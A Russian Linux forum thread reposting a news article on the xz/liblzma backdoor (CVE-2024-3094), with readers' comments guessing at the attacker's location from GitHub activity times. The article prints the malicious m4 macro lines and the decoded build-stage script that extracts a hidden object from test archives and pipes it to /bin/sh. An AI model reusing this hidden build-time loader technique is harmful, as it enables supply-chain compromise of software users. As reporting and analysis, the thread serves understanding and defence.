[ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Обсуждение новостей, соответствующих тематике форума

Модератор: Модераторы разделов

Ответить
Аватара пользователя
rssbot
Бот
Сообщения: 6002
ОС: gnu/linux

[ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение rssbot »

В пакете XZ Utils, включающем библиотеку liblzma и утилиты для работы со сжатыми данными в формате ".xz", выявлен бэкдор (CVE-2024-3094), позволяющий перехватывать и модифицировать данные, обрабатываемые приложениями, связанными с библиотекой liblzma. Основной целью бэкдора является сервер OpenSSH, в некоторых дистрибутивах связанный с библиотекой libsystemd, которая, в свою очередь, использует liblzma. Связывание sshd с уязвимой библиотекой позволяет злоумышленникам получить доступ к SSH-серверу без аутентификации.


Бэкдор присутствовал в официальных выпусках xz 5.6.0 и 5.6.1, опубликованных 24 февраля и 9 марта, которые успели попасть в состав некоторых дистрибутивов и репозиториев, например, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide и 40-beta, openSUSE factory и tumbleweed, LibreELEC, Alpine edge, Solus, CRUX, Cygwin, MSYS2 mingw, HP-UX, Homebrew, KaOS, NixOS unstable, OpenIndiana, Parabola, PCLinuxOS, OpenMandriva cooker и rolling, pkgsrc current, Slackware current, Manjaro, Void Linux. Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться как минимум на версию 5.4.6, но желательно на 5.4.1, как последний выпуск, опубликованный прошлым сопровождающим.


Из сглаживающих проблему факторов можно отметить то, что версия liblzma c бэкдором не успела войти в состав стабильных выпусков крупных дистрибутивов, но затронула openSUSE Tumbleweed. Arch Linux и Gentoo использовали уязвимую версию xz, но не подвержены атаке, так как не применяют к OpenSSH патч для поддержки systemd-notify, приводящий к связыванию sshd к liblzma. Для Fedora 40-beta был опубликован пакет с xz 5.6.0, но из-за проблем с valgrind он был
собран без поддержки IFUNC ('configure --disable-ifuncs'), т.е. бэкдор в нём был неработоспособен. Ubuntu и RHEL/CentOS не импортировали проблемные версии в свои репозитории. Бэкдор затрагивает только системы x86_64 на базе ядра Linux и Си-библиотеки Glibc, в которых sshd связывается с libsystemd для поддержки механизма sd_notify.





Код активации бэкдора был спрятан в m4-макросах из файла build-to-host.m4, используемого инструментарием automake при сборке. При сборке в ходе выполнения запутанных обфусцированных операций на основе архивов bad-3-corrupt_lzma2.xz и good-large_compressed.lzma, добавленных под предлогом использования в тестах корректности работы распаковщика, формировался объектный файл с вредоносным кодом, который включался в состав библиотеки liblzma и изменял логику работы некоторых её функций.


Активирующие бэкдор m4-макросы входили в состав tar-архивов релизов, но отсутствовали в Git-репозитории (были добавлены в .gitignore). При этом вредоносные тестовые архивы присутствовали в репозитории, т.е. внедривший бэкдор имел доступ как к репозиторию, так и к процессам формирования релизов. Более того, изначально файлы bad-3-corrupt_lzma2.xz и good-large_compressed.lzma были загружены 23 февраля перед релизом xz 5.6.0, а 9 марта обновлены перед релизом xz 5.6.1.


При использовании liblzma в приложениях вредоносные изменения могли использоваться для перехвата или модификации данных, а также для влияния на работу sshd. В частности, вредоносный код подменял функцию RSA_public_decrypt для обхода процесса аутентификации в sshd. Для неявного вызова и перехвата функций в бэкдоре применялся механизм IFUNC, присутствующий в Glibc. Бэкдор включал защиту от обнаружения и не проявлял себя при выставленных переменных окружения LANG и TERM (т.е. при запуске процесса в терминале) и не выставленных переменных окружения LD_DEBUG и LD_PROFILE, а активировался только при выполнении исполняемого файла /usr/sbin/sshd. В бэкдоре также имелись средства обнаружения запуска в отладочных окружениях.




В файле m4/build-to-host.m4 использовались конструкции

Код:

gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

В первой конструкции операция grep находила файл tests/files/bad-3-corrupt_lzma2.xz, при распаковке которого формировался сценарий, распаковывающий объектный файл из второго архива:

Код:

####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 ›/dev/null) && head -c +2048 .... && (head -c +1024 ›/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

Каким образом злоумышленникам удалось получить доступ к инфраструктуре проекта xz пока до конца не выяснено, но по предварительным данным внедрение бэкдора осуществлено целенаправленно одним из активных разработчиков проекта xz. Так же пока не ясно как много пользователей и проектов были скомпрометированы в результате действия бэкдора. Предполагаемый автор бэкдора (JiaT75 - Jia Tan), разместивший в репозитории архивы с вредоносным кодом и затем их обновивший, переписывался с разработчиками Fedora и отправлял pull-запросы в Debian, связанные с переходом дистрибутивов на ветку xz 5.6.0.

Разработчик Jia Tan не вызвал подозрений, так как участвовал в разработке xz, имел статус "co-maintainer" на протяжении последних двух лет, выпускал релизы начиная с xz 5.4.2 и являлся вторым участником проекта по числу внесённых изменений. Помимо проекта xz предполагаемый автор бэкдора также участвовал в разработке пакетов xz-java и xz-embedded. Более того, Jia Tan несколько дней назад был включён в число мэйнтейнеров проекта XZ Embedded, используемого в ядре Linux.


Вредоносное изменение было выявлено после анализа излишнего потребления CPU и ошибок, выдаваемых valgrind, при подключении через ssh к системам на базе Debian sid. Примечательно, что в релиз xz 5.6.1 были включены изменения, подготовленные предполагаемым автором бэкдора в ответ на жалобы о замедлении работы и сбоях sshd, возникшие после обновления до версии xz 5.6.0 с бэкдором. Кроме того, в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.



Дополнение 1: GitHub полностью заблокировал репозитории xz, xz-java и xz-embedded, которые теперь недоступны для анализа и загрузки прошлых версий. Также заблокирован официальный сайт проекта xz.tukaani.org. На archive.org и сайте проекта осталась последняя рабочая копия.

Дополнение 2: В 2021 году Jia Tan передал изменение в проект libarchive и добился замены вызова safe_fprintf на небезопасный fprintf (несколько часов назад изменение было отменено).


Дополнение 3: Опубликован разбор событий, способствующих продвижению бэкдора в пакет xz.




Дополнение 4: Lasse Collin, прошлый сопровождающий проекта xz, передавший права Jia Tan, опубликовал заявление, в котором подтвердил, что архивы с содержащими бэкдор релизами были созданы и подписаны Jia Tan. Он также сообщил об удалении поддомена xz.tukaani.org (сайт xz будет возвращён на основной сервер tukaani.org) и упомянул, что его учётную запись на GitHub заблокировали. Lasse Collin единолично контролирует сайт tukaani.org и репозитории git.tukaani.org, а Jia Tan контролировал только проект на GitHub и хост xz.tukaani.org, но не имел доступа к серверу tukaani.org.

Дополнение 5: Разбор логики активации и работы бэкдора в пакете xz.


Дополнение 6: В сборочном сценарии CMakeLists.txt выявлено вредоносное изменение, не позволяющее использовать в xz механизм изоляции приложений Landlock.


Дополнение 7: По мотивам выявленного бэкдора подготовлен инструментарий xzbot, включающий в себя: honeypot для создания фиктивных серверов, притворяющихся уязвимыми для выявления попыток подключения злоумышленников; патч для замены открытого ключа в бэкдоре внутри liblzma.so на свой ключ (чтобы подключаться к бэкдору по своему закрытому ключу); демонстрацию для инициирования выполнения кода в модифицированном бэкдоре, используя свой закрытый ключ.






Источник: https://www.opennet.ru/opennews/art.shtml?num=60877
(opennet.ru, основная лента)
Последний раз редактировалось rssbot 01.04.2024 21:37, всего редактировалось 21 раз.
Причина: Updated upstream
Спасибо сказали:
Аватара пользователя
yoricI
Сообщения: 2394
ОС: gentoo fluxbox

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение yoricI »

Вот так опенсорс. Хоть на винду подавайся...
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

Я надеюсь, что типа китайское имя вредителя не введёт разумных людей в заблуждение, и каждый будет исходить из того, что это мог быть кто-то, кто заинтересован в нанесении максимального вреда именно ему.
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
UnixNoob
Сообщения: 1380
ОС: Slackware

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение UnixNoob »

yoricI писал:
30.03.2024 11:27
Хоть на винду подавайся...
А то там проблем нет.
"Однажды один очень мудрый человек… ничего не сказал. Времена были опасные, да и собеседники ненадёжные"
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

yoricI писал:
30.03.2024 13:42
Туманно выражаетесь))
По-простому: не надо думать «это был китаец, а китайцам до меня дела нет», потому что это, скорее всего, был не китаец.
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
sunjob
Сообщения: 331
Контактная информация:

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение sunjob »

это мог быть кто гугодно, втч и китаис!
если я ошибаюсь, то поправьте а не критикуйте :о)
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

Интересно поизучать время его активности. Можно довольно точно часовой пояс установить.
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
yoricI
Сообщения: 2394
ОС: gentoo fluxbox

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение yoricI »

Bizdelnick писал:
30.03.2024 16:22
скорее всего, был не китаец
Из этого следует, что не так-то просто спецслужбам зайти с чёрного хода))
Спасибо сказали:
Аватара пользователя
bars
Сообщения: 940
ОС: BSD/LINUX
Контактная информация:

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение bars »

Bizdelnick писал:
30.03.2024 17:06
Интересно поизучать время его активности. Можно довольно точно часовой пояс установить.
Не думаю, что так прям затратно или проблематично подделать сетевые следы (ip/часовой пояс и т.д.).

Как выше товарищ отписался, это мог быть кто угодно и китаеса тоже!
Настройка BSD систем
Знание сила, незнание Рабочая сила!
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

Время активности на гитхабе за последние 90 дней:

Код: Выделить всё

"2024-03-28T14:59:59Z"
"2024-03-28T13:27:31Z"
"2024-03-26T12:11:30Z"
"2024-03-26T12:09:32Z"
"2024-03-25T17:14:47Z"
"2024-03-25T17:08:06Z"
"2024-03-25T16:47:59Z"
"2024-03-25T14:44:34Z"
"2024-03-22T14:56:41Z"
"2024-03-22T14:54:25Z"
"2024-03-22T14:51:38Z"
"2024-03-22T14:40:30Z"
"2024-03-22T14:40:08Z"
"2024-03-22T12:23:35Z"
"2024-03-22T12:23:23Z"
"2024-03-22T12:15:30Z"
"2024-03-22T11:48:30Z"
"2024-03-22T11:36:21Z"
"2024-03-19T11:47:53Z"
"2024-03-13T16:12:30Z"
"2024-03-13T15:50:19Z"
"2024-03-13T15:27:53Z"
"2024-03-13T14:44:50Z"
"2024-03-11T14:37:02Z"
"2024-03-11T14:37:03Z"
"2024-03-11T12:18:20Z"
"2024-03-09T12:00:46Z"
"2024-03-09T10:46:06Z"
"2024-03-09T10:44:38Z"
"2024-03-09T10:40:57Z"
"2024-03-09T10:40:12Z"
"2024-03-09T09:51:04Z"
"2024-03-09T09:36:25Z"
"2024-03-08T12:06:53Z"
"2024-03-07T17:44:35Z"
"2024-03-05T10:18:48Z"
"2024-03-04T17:55:15Z"
"2024-03-04T17:40:09Z"
"2024-03-04T17:14:39Z"
"2024-03-04T16:49:22Z"
"2024-03-04T15:01:19Z"
"2024-03-02T13:32:49Z"
"2024-03-02T13:32:48Z"
"2024-03-02T13:32:01Z"
"2024-03-02T13:32:02Z"
"2024-03-02T13:23:56Z"
"2024-03-02T13:23:57Z"
"2024-03-02T13:18:34Z"
"2024-02-29T17:35:39Z"
"2024-02-29T17:30:09Z"
"2024-02-29T17:30:10Z"
"2024-02-29T16:56:54Z"
"2024-02-29T16:56:55Z"
"2024-02-29T16:56:03Z"
"2024-02-29T16:56:02Z"
"2024-02-29T16:55:33Z"
"2024-02-29T16:55:34Z"
"2024-02-29T16:52:14Z"
"2024-02-29T16:52:15Z"
"2024-02-29T16:50:01Z"
"2024-02-29T16:50:00Z"
"2024-02-29T16:46:10Z"
"2024-02-29T16:46:11Z"
"2024-02-29T16:44:51Z"
"2024-02-29T16:44:52Z"
"2024-02-29T16:42:00Z"
"2024-02-29T16:41:59Z"
"2024-02-29T16:34:27Z"
"2024-02-29T16:34:28Z"
"2024-02-29T16:33:20Z"
"2024-02-28T16:19:35Z"
"2024-02-28T16:07:33Z"
"2024-02-28T13:33:25Z"
"2024-02-27T16:53:48Z"
"2024-02-27T15:48:22Z"
"2024-02-27T12:29:17Z"
"2024-02-27T12:24:36Z"
"2024-02-26T15:41:14Z"
"2024-02-26T15:36:07Z"
"2024-02-26T15:36:05Z"
"2024-02-26T15:32:33Z"
"2024-02-26T15:30:21Z"
"2024-02-26T15:28:19Z"
"2024-02-26T15:22:10Z"
"2024-02-26T15:11:55Z"
"2024-02-26T13:16:06Z"
"2024-02-26T12:20:09Z"
"2024-02-26T12:07:43Z"
"2024-02-26T12:02:10Z"
"2024-02-26T11:57:55Z"
"2024-02-26T11:49:04Z"
"2024-02-25T13:42:52Z"
"2024-02-25T13:41:06Z"
"2024-02-25T13:41:03Z"
"2024-02-25T03:28:00Z"
"2024-02-24T11:19:45Z"
"2024-02-24T10:09:03Z"
"2024-02-24T10:04:33Z"
"2024-02-24T10:04:07Z"
"2024-02-24T10:01:50Z"
"2024-02-24T09:06:52Z"
"2024-02-23T15:46:22Z"
"2024-02-23T15:43:57Z"
"2024-02-23T13:15:14Z"
"2024-02-23T13:14:15Z"
"2024-02-23T12:48:54Z"
"2024-02-22T17:24:19Z"
"2024-02-22T15:12:43Z"
"2024-02-22T15:07:49Z"
"2024-02-22T15:04:33Z"
"2024-02-22T14:27:52Z"
"2024-02-22T12:50:59Z"
"2024-02-22T12:29:53Z"
"2024-02-22T12:24:57Z"
"2024-02-22T11:52:48Z"
"2024-02-21T17:43:31Z"
"2024-02-21T16:58:49Z"
"2024-02-21T16:57:46Z"
"2024-02-21T16:37:07Z"
"2024-02-21T14:37:25Z"
"2024-02-20T16:33:10Z"
"2024-02-20T15:33:05Z"
"2024-02-20T13:14:52Z"
"2024-02-17T17:14:55Z"
"2024-02-17T14:31:24Z"
"2024-02-17T14:31:23Z"
"2024-02-17T13:13:54Z"
"2024-02-16T14:55:19Z"
"2024-02-15T14:28:08Z"
"2024-02-14T18:25:15Z"
"2024-02-14T18:19:36Z"
"2024-02-14T18:13:29Z"
"2024-02-14T18:05:56Z"
"2024-02-13T15:34:01Z"
"2024-02-12T17:57:06Z"
"2024-02-12T12:43:38Z"
"2024-02-12T12:43:14Z"
"2024-02-10T16:13:09Z"
"2024-02-10T16:12:29Z"
"2024-02-10T16:10:54Z"
"2024-02-10T16:08:51Z"
"2024-02-10T16:03:24Z"
"2024-02-10T16:01:08Z"
"2024-02-09T16:00:37Z"
"2024-02-09T12:09:44Z"
"2024-02-08T12:10:43Z"
"2024-02-07T14:04:54Z"
"2024-02-01T17:42:02Z"
"2024-02-01T12:57:09Z"
"2024-02-01T12:52:50Z"
"2024-02-01T12:52:49Z"
"2024-02-01T12:24:12Z"
"2024-01-31T17:45:59Z"
"2024-01-31T16:41:08Z"
"2024-01-31T16:24:51Z"
"2024-01-31T16:04:26Z"
"2024-01-31T15:30:34Z"
"2024-01-31T12:02:59Z"
"2024-01-31T11:54:46Z"
"2024-01-30T12:58:43Z"
"2024-01-30T12:51:15Z"
"2024-01-29T13:50:48Z"
"2024-01-29T12:08:42Z"
"2024-01-27T16:20:00Z"
"2024-01-27T16:12:13Z"
"2024-01-27T16:05:38Z"
"2024-01-26T13:01:14Z"
"2024-01-26T12:27:04Z"
"2024-01-26T12:22:12Z"
"2024-01-26T12:16:54Z"
"2024-01-26T12:13:18Z"
"2024-01-26T12:13:01Z"
"2024-01-26T12:11:38Z"
"2024-01-26T12:11:22Z"
"2024-01-25T16:39:48Z"
"2024-01-24T17:49:57Z"
"2024-01-24T17:49:27Z"
"2024-01-24T17:39:51Z"
"2024-01-24T17:32:01Z"
"2024-01-24T17:21:18Z"
"2024-01-24T17:07:57Z"
"2024-01-24T16:19:41Z"
"2024-01-24T16:16:53Z"
"2024-01-24T16:12:40Z"
"2024-01-24T15:47:44Z"
"2024-01-24T14:32:56Z"
"2024-01-24T12:12:58Z"
"2024-01-24T12:12:57Z"
"2024-01-24T12:10:59Z"
"2024-01-23T16:41:24Z"
"2024-01-23T15:57:07Z"
"2024-01-23T15:17:33Z"
"2024-01-23T14:18:44Z"
"2024-01-23T12:56:35Z"
"2024-01-22T15:34:19Z"
"2024-01-22T12:06:26Z"
"2024-01-19T15:58:20Z"
"2024-01-19T15:42:21Z"
"2024-01-19T15:40:17Z"
"2024-01-19T15:40:16Z"
"2024-01-19T15:39:19Z"
"2024-01-19T15:24:47Z"
"2024-01-19T15:17:02Z"
"2024-01-19T15:09:41Z"
"2024-01-19T15:08:47Z"
"2024-01-19T14:43:25Z"
"2024-01-19T14:32:29Z"
"2024-01-19T14:17:19Z"
"2024-01-19T12:18:41Z"
"2024-01-18T15:05:38Z"
"2024-01-18T13:16:09Z"
"2024-01-18T12:51:41Z"
"2024-01-17T12:41:17Z"
"2024-01-17T12:29:43Z"
"2024-01-17T12:10:43Z"
"2024-01-16T18:54:11Z"
"2024-01-16T14:08:14Z"
"2024-01-16T13:31:12Z"
"2024-01-16T13:20:44Z"
"2024-01-16T12:10:44Z"
"2024-01-16T12:08:46Z"
"2024-01-16T12:08:33Z"
"2024-01-15T17:41:09Z"
"2024-01-15T14:42:56Z"
"2024-01-15T13:41:37Z"
"2024-01-13T16:01:10Z"
"2024-01-13T15:45:05Z"
"2024-01-13T15:33:58Z"
"2024-01-13T13:19:25Z"
"2024-01-12T14:29:03Z"
"2024-01-11T17:16:22Z"
"2024-01-11T14:05:33Z"
"2024-01-10T13:06:10Z"
"2024-01-10T12:12:53Z"
"2024-01-09T12:46:06Z"
"2024-01-08T15:11:40Z"
"2024-01-08T13:44:08Z"
"2024-01-05T14:53:11Z"
"2024-01-05T13:17:52Z"
Разброс с 10 до 18 по UTC. В Китае UTC+8, выходит, там это было бы с 18 до 2 часов. Странно выглядит, как мне кажется: рановато для работы по вечерам в свободное время и слишком поздно для основной работы. Западное полушарие, похоже, можно исключить. На мой взгляд, это плюс-минус Европа или не сильно восточная Азия (ну или Африка, конечно, как я забыл про знаменитых африканских хакеров).
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
sunjob
Сообщения: 331
Контактная информация:

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение sunjob »

> рановато для работы по вечерам в свободное время и слишком поздно для основной работы
а вы знаете режим работы "данного какера"? вообще не фак, что он днем работает а ночью спит... или как-то из "этой серии" :о) вообще не фак!
если я ошибаюсь, то поправьте а не критикуйте :о)
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

sunjob писал(а):
02.04.2024 11:45
вы знаете режим работы "данного какера"?
Я практически уверен, что он не в одиночку это всё пытался провернуть. Это либо какая-то спецслужба, либо работающая на спецслужбы компания типа NSO. Для простых мошенников слишком сложная и слишком долгая операция.
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

А вот ещё разбор времени коммитов за 2021 год. Я на это время смотреть не стал, потому что его легко подделать.
Пара мыслей по поводу статистики с GitHub:
  • Активность равномерно распределена по всем дням недели кроме воскресенья. В воскресенье почти отсутствует (всего 4 события). Так что вряд ли это NSO или какие-то другие израильтяне.
  • Во время китайского нового года (10-24 февраля) уровень активности значимо не менялся. Так что вряд ли это китайцы.
  • Если предположить, что активность приходится на рабочий день с 9 до 18, то это соответствует часовому поясу UTC+0. Если отбросить активность по воскресеньям как нетипичную, за эти рамки выбиваются только 5 событий, произошедших в промежуток между 18:00 и 19:00 UTC.
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
sunjob
Сообщения: 331
Контактная информация:

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение sunjob »

Bizdelnick писал:
02.04.2024 11:56
Я практически уверен
тут-то кто спорит?! одно другому не мешает... режим работы "у таких инивидумоф" ну ни как не пересекается с восход-закатом! если это шпионская группа - она точно равномерно распределена по поверхности и не находится в "одном конкретном месте".
ну... это мое имхо! как говорил пузьма круткоф - зри в корень, кому выгодно! :о)
легко подделать
вот эт точно!
если я ошибаюсь, то поправьте а не критикуйте :о)
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

sunjob писал(а):
04.04.2024 14:03
ежим работы "у таких инивидумоф" ну ни как не пересекается с восход-закатом! если это шпионская группа - она точно равномерно распределена по поверхности и не находится в "одном конкретном месте".
Завидую Вашим познаниям.
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
yoricI
Сообщения: 2394
ОС: gentoo fluxbox

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение yoricI »

Bizdelnick
Вы поймать "его" хотите? К чему усилия, если всё это можно подделать? Вот как защититься и недопустить, в этом направлении мыслить продуктивно))
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

yoricI писал:
04.04.2024 15:55
Вы поймать "его" хотите?
Это совершенно точно не в моих силах.
yoricI писал:
04.04.2024 15:55
К чему усилия, если всё это можно подделать?
Не всё. Время коммита подделать можно, или время отправки письма. Время события на гитхабе или время получения письма сервером — нет. Поэтому я не смотрел на записанное в коммитах время, а смотрел на время, записанное гитхабом.
yoricI писал:
04.04.2024 15:55
Вот как защититься и недопустить, в этом направлении мыслить продуктивно))
Если удастся раскрыть, кто за этим стоит, в следующий раз, возможно, они таким заниматься не станут. А на 100% защититься невозможно.
Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
yoricI
Сообщения: 2394
ОС: gentoo fluxbox

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение yoricI »

Bizdelnick писал:
04.04.2024 16:04
Если удастся раскрыть, кто за этим стоит, в следующий раз, возможно, они таким заниматься не станут
По-моему, это тщётные надежды. Раскрыть-то хорошо бы, но в следующий раз будут действовать изощрённее))
Спасибо сказали:
Аватара пользователя
Bizdelnick
Модератор
Сообщения: 20800
Статус: nulla salus bello
ОС: Debian GNU/Linux

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение Bizdelnick »

Пишите правильно:
в консоли
вку́пе (с чем-либо)
в общем
вообще
в течение (часа)
новичок
нюанс
по умолчанию
приемлемо
проблема
пробовать
трафик
Спасибо сказали:
Аватара пользователя
bars
Сообщения: 940
ОС: BSD/LINUX
Контактная информация:

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение bars »

Все что на пике популярности нужно в двойне мониторить, обезопасевать.
xz кокраз на пике популярности, им стали почти все сжимать.
Настройка BSD систем
Знание сила, незнание Рабочая сила!
Спасибо сказали:
Аватара пользователя
RusWolf
Сообщения: 605
ОС: Arch Linux x64 на BTRFS

Re: [ON] В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

Сообщение RusWolf »

bars писал:
05.04.2024 09:41
xz кокраз на пике популярности
Я наивно думал, что zstd на пике популярности.
Спасибо сказали:
Ответить